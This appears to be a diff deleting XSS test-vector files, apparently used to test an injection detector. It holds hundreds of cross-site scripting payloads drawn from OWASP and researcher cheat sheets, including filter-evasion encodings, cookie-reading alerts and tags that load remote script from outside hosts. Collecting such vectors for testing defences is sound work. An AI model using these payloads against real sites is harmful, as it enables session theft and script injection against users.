test 100_7 <img%0Bsrc=x onerror="alert(1)">
# [b] case
test 100_8 <img %47src=x onerror="alert(1)">
test 100_9 <img %00src=x onerror="alert(1)">
# [c] case
test 100_10 <img src=x onerror%09="alert(1)">
test 100_11 <img src=x onerror%0A="alert(1)">
test 100_12 <img src=x onerror%0C="alert(1)">
test 100_13 <img src=x onerror%0D="alert(1)">
test 100_14 <img src=x onerror%20="alert(1)">
test 100_15 <img src=x onerror%00="alert(1)">
test 100_16 <img src=x onerror%0B="alert(1)">
# [d] case
test 100_17 <img src=x%09onerror="alert(1)">
test 100_18 <img src=x%0Aonerror="alert(1)">
test 100_19 <img src=x%0Conerror="alert(1)">
test 100_20 <img src=x%0Donerror="alert(1)">
test 100_21 <img src=x%20onerror="alert(1)">
test 100_22 <img src=x%0Bonerror="alert(1)">
# [e] case
test 100_23 <img src=x onerror=%09"alert(1)">
test 100_24 <img src=x onerror=%0A"alert(1)">
test 100_25 <img src=x onerror=%0C"alert(1)">
test 100_26 <img src=x onerror=%0D"alert(1)">
test 100_27 <img src=x onerror=%20"alert(1)">
test 100_28 <img src=x onerror=%00"alert(1)">
test 100_29 <img src=x onerror=%0B"alert(1)">
# <a href="[a]java[b]script[c]:alert(1)">XXX</a>
test 101_x <a href="javascript:alert(1)">XXX</a>
test 101_0 <a href="%00javascript:alert(1)">XXX</a>
test 101_1 <a href="%01javascript:alert(1)">XXX</a>
test 101_2 <a href="%02javascript:alert(1)">XXX</a>
test 101_3 <a href="%03javascript:alert(1)">XXX</a>
test 101_4 <a href="%04javascript:alert(1)">XXX</a>
test 101_5 <a href="%05javascript:alert(1)">XXX</a>
test 101_6 <a href="%06javascript:alert(1)">XXX</a>
test 101_7 <a href="%07javascript:alert(1)">XXX</a>
test 101_8 <a href="%08javascript:alert(1)">XXX</a>
test 101_9 <a href="%09javascript:alert(1)">XXX</a>
test 101_10 <a href="%0Ajavascript:alert(1)">XXX</a>
test 101_11 <a href="%0Bjavascript:alert(1)">XXX</a>
test 101_12 <a href="%0Cjavascript:alert(1)">XXX</a>
test 101_13 <a href="%0Djavascript:alert(1)">XXX</a>
test 101_14 <a href="%0Ejavascript:alert(1)">XXX</a>
test 101_15 <a href="%0Fjavascript:alert(1)">XXX</a>
test 101_16 <a href="%10javascript:alert(1)">XXX</a>
test 101_17 <a href="%11javascript:alert(1)">XXX</a>
test 101_18 <a href="%12javascript:alert(1)">XXX</a>
test 101_19 <a href="%13javascript:alert(1)">XXX</a>
test 101_20 <a href="%14javascript:alert(1)">XXX</a>
test 101_21 <a href="%15javascript:alert(1)">XXX</a>
test 101_22 <a href="%16javascript:alert(1)">XXX</a>
test 101_23 <a href="%17javascript:alert(1)">XXX</a>
test 101_24 <a href="%18javascript:alert(1)">XXX</a>
test 101_25 <a href="%19javascript:alert(1)">XXX</a>
test 101_26 <a href="%1Ajavascript:alert(1)">XXX</a>
test 101_27 <a href="%1Bjavascript:alert(1)">XXX</a>
test 101_28 <a href="%1Cjavascript:alert(1)">XXX</a>
test 101_29 <a href="%1Djavascript:alert(1)">XXX</a>
test 101_30 <a href="%1Ejavascript:alert(1)">XXX</a>
test 101_31 <a href="%1Fjavascript:alert(1)">XXX</a>
test 101_32 <a href="%20javascript:alert(1)">XXX</a>
# B -- other cases are obsolete
test 101_33 <a href="j%00avascript:alert(1)">XXX</a>
# Confirmed in IE8, Does not work in IE9+
test 102 <img src="x` `<script>alert(1)</script>"` `>
test 103 <script>history.pushState(0,0,'/i/am/somewhere_else');</script>
test 104 <svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>
test 105 <iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
# Safari 4, supported 2005-2010, now obsolete
# test 106 <img src onerror /" '"= alt=alert(1)//">
test 107 <title onpropertychange=alert(1)></title><title title=></title>
test 108_1 <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">
test 108_2 <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">
test 108_3 <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
# test 109 SVG
test 110_1 <svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>
test 110_2 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>
test 111 <div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
test 112 <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
test 113 <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
test 114 <x style="background:url('x[a];color:red;/*')">XXX</x>
test 115_1 <!--[if]><script>alert(1)</script -->
test 115_2 <!--[if<img src=x onerror=alert(2)//]> -->
test 116_1 <import namespace="t" implementation="#default#time2">
test 116_2 <?import namespace="t" implementation="#default#time2">
test 117 <a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>
test 118 <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div>
test 119 <iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>
test 120 <a href="#" onclick="makePopups()">Spam</a>
# original for SVG masking
# repurposing this as a generic "no SVG"
test 121_1 <svg:svg>
test 121_2 <svg>
test 121_3 <svg:mast id="foo">
test 122 <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
# test 123 "class jacking with jquery" http://html5sec.org/#131, requires scripting
test 124_1 <script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10
test 124_2 <script src="\\example.com\foo.js"></script> // Safari 5.0
test 125 <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
test 126_1 <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object>
test 127_2 <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
test 127_1 <svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>
test 127_2 <handler id="y">alert(1)</handler>
test 127_3 <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/>
test 128 <svg><style>&lt;img/src=x onerror=alert(1)// </b>
test 129_1 <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
test 129_2 <image filter='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'>
test 130_1 <math href="javascript:alert(1)">CLICKME</math>
test 130_2 <math><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction>
test 130_3 <math><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
# Obsolete FF < 10
#test 131 TBD Drag and Drop http://html5sec.org/#131
test 132_1 <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" />
test 132_2 <svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image>
test 133 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
test 134_1 <xmp> <%25 </xmp> <img alt='%25></xmp><img src=xx:x onerror=alert(1)//'>
test 134_2 <script> x='<%25' </script> %25>/ alert(2) </script>
test 134_3 XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>
test 135 <!-- `<img/src=xx:xx onerror=alert(1)//--!>
# Somewhat odd injection -- ignoring. We can ban dirname is this
# is really a problem
#test 136 <input name="injected" value="injected" dirname="password" />
test 137_1 <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" />
test 137_2 <svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>


@ -1,7 +0,0 @@
# Mauro Gentile
# https://www.owasp.org/images/7/7c/Gentile_OWASP_EU_Tour_2013.pdf
<input onfocus=write(1) autofocus>
<form id="test" /><button form="test" formaction="javascript:alert(1)">X</button>
<video><source onerror="alert(1)">
<form><button><button form="test" formaction="javascript:alert(1)">X</button>
<script/src=data


@ -1,2 +0,0 @@
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
<scr%00ipt>confirm(0);</scr%00ipt>


@ -1,3 +0,0 @@
# http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html
%3Cscript%3Edocument.body.innerHTML=%22%3Ca%20onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27%3E%3Cinput%20name=attributes%3E%22;%3C/script%3E


@ -1,259 +0,0 @@
#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this wildly obsolete
#
# XSS Locator 2
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=JaVaScRiPt:alert('XSS')>
# Grave Accent Obfuscation
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
# Malformed A Tags
# (not actually malformed)
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
# Malformed IMG Tags
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
# fromCharCode
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
# Default SRC tag to get past filters that check SRC domain
<IMG SRC=# onmouseover="alert('xxs')">
# Default SRC tag by leaving it empty
# nickg; Unable to replicate in FF,Safari,Chrome 2014-01-10
# <IMG SRC= onmouseover="alert('xxs')">
# Default SRC tag by leaving it out entirely
<IMG onmouseover="alert('xxs')">
# Decimal HTML character references
# obsolete?
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC="/" onerror=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
# Decimal HTML character references without trailing semicolons
# obsolete
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC="/x" onerror=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
# Hexadecimal HTML character references without trailing semicolons
# obsolete form
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="/" onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
# Embedded tab
# obsolete form
#<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="/x" onerror="jav ascript:alert('XSS');">
# Embedded escaped tab
# obsolete form
#<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="/" onerror="jav&#x09;ascript:alert('XSS');">
# Embedded newline to break up XSS
# obsolete form
#<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
# Embedded CR
# obsolete form
#<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="/x" onerror="jav&#x0D;ascript:alert('XSS');">
# Null
# obsolete form
# <IMG SRC="jav%00ascript:alert('XSS');">
<IMG SRC="/x" onerror="jav%00ascript:alert('XSS');">
# Spaces and meta chars before the JavaScript in images for XSS
# obsolete form
#<IMG SRC=" &#14; javascript:alert('XSS');">
<IMG SRC="/x" onerror=" &#14; javascript:alert('XSS');">
# Non-alpha-non-digit XS
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
# this is bogus or obsolete
# <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
# Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
# No closing script tags
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
# Protocol resolution in script tags
<SCRIPT SRC=//ha.ckers.org/.j>
# Half open HTML/JavaScript XSS vector
<IMG SRC="javascript:alert('XSS')"
# Double open angle brackets
<iframe src=http://ha.ckers.org/scriptlet.html <
# Escaping JavaScript escapes
# N/A
# End title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
# INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
# BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
# IMG Dynsrc
# Wildly obsolete
<IMG DYNSRC="javascript:alert('XSS')">
# IMG LOW src
# Wildy obsolete
<IMG LOWSRC="javascript:alert('XSS')">
# List-style-image
# likely obsolete
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
# VBscript in an image
<IMG SRC='vbscript:msgbox("XSS")'>
# Livescript (older versions of Netscape only)
# Obsolete
# <IMG SRC="livescript:[code]">
# BODY tag
<BODY ONLOAD=alert('XSS')>
# BGSOUND
<BGSOUND SRC="javascript:alert('XSS');"
# & JavaScript includes
# Obsolete
# <BR SIZE="&{alert('XSS')}">
# STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
# Remote style sheet
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
# Remote style sheet part 2
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
# Remote style sheet part 3
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
# Remote style sheet part 4
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
# STYLE tags with broken up JavaScript for XSS
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
# STYLE attribute using a comment to break up expression
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"
# IMG STYLE with expression
# N/A
# STYLE tag (Older versions of Netscape only)
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
# STYLE tag using background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
# STYLE tag using background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
# Anonymous HTML with STYLE attribute
<XSS STYLE="xss:expression(alert('XSS'))">
# Local htc file
<XSS STYLE="behavior: url(xss.htc);">
# META
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
# META using data
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
# META
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
# IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
# IFRAME Event based
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
# FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
# TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
# TD
<TABLE BACKGROUND="javascript:alert('XSS')">
# DIV background-image
<TABLE BACKGROUND="javascript:alert('XSS')">
# DIV background-image with unicoded XSS exploit
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
# DIV background-image plus extra characters
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
# DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
# "Downlevel-hidden block"
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
# BASE tag
<BASE HREF="javascript:alert('XSS');//">
# Object tag
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
# Using an EMBED tag you can embed a Flash movie that contains XSS
<EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf" AllowScriptAccess="always"></EMBED>
# You can EMBED SVG which can contain your XSS vector
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
# Using ActionScript inside flash can obfuscate your XSS vector
# N/A
# XML data island with CDATA obfuscation
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
# Locally hosted XML with embedded JavaScript that is generated using an XML data island
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
# XSS using HTML quote encapsulatio
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>


@ -1,86 +0,0 @@
#
# Really simple XSS smoke test
#
#
# Script Tags
#
# in plain text context - duh
<script>alert(1);</script>
# as attribute <tag $USERINPUT></tag>
><script>alert(1);</script>
# as unquoted value <tag foo=$USERINPUT></tag>
x ><script>alert(1);</script>
# as single quoted value <tag foo='$USERINPUT'></tag>
' ><script>alert(1);</script>
# as double quoted value <tag foo="$USERINPUT"></tag>
"><script>alert(1);</script>
# inside <style>div:color=$USERINPUT;.. </style>
red;</style><script>alert(1);</script>
# inside <style>div { color=$USERINPUT;..} </style>
red;}</style><script>alert(1);</script>
# inside <div style="color:$USERINPUT"...
red;"/><script>alert(1);</script>
# inside CSS URL, e.g. background-image:url('$USERINPUT')
');}</style><script>alert(1);</script>
#
# onerror (or on-other)
#
# as attribute <tag $USERINPUT></tag>
onerror=alert(1)>
# as unquoted value <tag foo=$USERINPUT></tag>
x onerror=alert(1);>
# as single quoted value <tag foo='$USERINPUT'></tag>
x' onerror=alert(1);>
# as double quoted value <tag foo='$USERINPUT'></tag>
x" onerror=alert(1);>
#
# href-like
#
# duh
<a href="javascript:alert(1)">
<a href='javascript:alert(1)'>
<a href=javascript:alert(1)>
<a href = javascript:alert(1); >
<a href=" javascript:alert(1);" >
<a href="JAVASCRIPT:alert(1);" >
<a href="&#32;javascript:alert(1)" >
<a href="&#00032;javascript:alert(1)" >
<a href="&#x20;javascript:alert(1)" >
# does not work
#<a href="&nbsp;javascript:alert(1)" >
<a href="&#X20;javascript:alert(1)" >
<a href="&#74;avascript:alert(1)" >
<a href="&#000074;avascript:alert(1)" >
# really a raw embedded null
<a href="j&#0;avascript:alert(1)">


@ -1,105 +0,0 @@
# http://slid.es/mscasharjaved/cross-site-scripting-my-love
# http://pastebin.com/u6FY1xDA
# @soaj1664ashar
#
1) <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
4) <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
5) <img/src=`%00` onerror=this.onerror=confirm(1)
6) <form><isindex formaction="javascript&colon;confirm(1)"
7) <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
12) &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
13) <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
14) <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
15) <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
18) <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
19) <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
20) </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
21) <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
22) <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
23) <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
24) http://www.google<script .com>alert(document.location)</script
25) <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
26) <img/src=@&#32;&#13; onerror = prompt('&#49;')
27) <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
29) </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
30) &#00;</form><input type&#61;"date" onfocus="alert(1)">
31) <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
33) <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
34) <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
35) <script ~~~>alert(0%250)</script ~~~>
36) <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
37) <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
39) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
40) &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
41) <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
43) <iframe/%00/ src=javaSCRIPT&colon;alert(1)
44) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
47) </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
48) <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
51) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
52) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
53) <iframe style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)">
54) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
59) <img src="/" =_=" title="onerror='prompt(1)'">
60) <%25<!--'%25><script>alert(1);</script -->
61) <script src="data:text/javascript,alert(1)"></script>
62) <iframe/src \/\/onload = prompt(1)
63) <iframe/onreadystatechange=alert(1)
64) <svg/onload=alert(1)
65) <input value=<><iframe/src=javascript:confirm(1)
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com
68) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
69) <svg><script ?>alert(1)
70) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
71) <img src=`xx:xx`onerror=alert(1)>
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
73) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
76) <svg contentScriptType=text/vbs><script>MsgBox+1
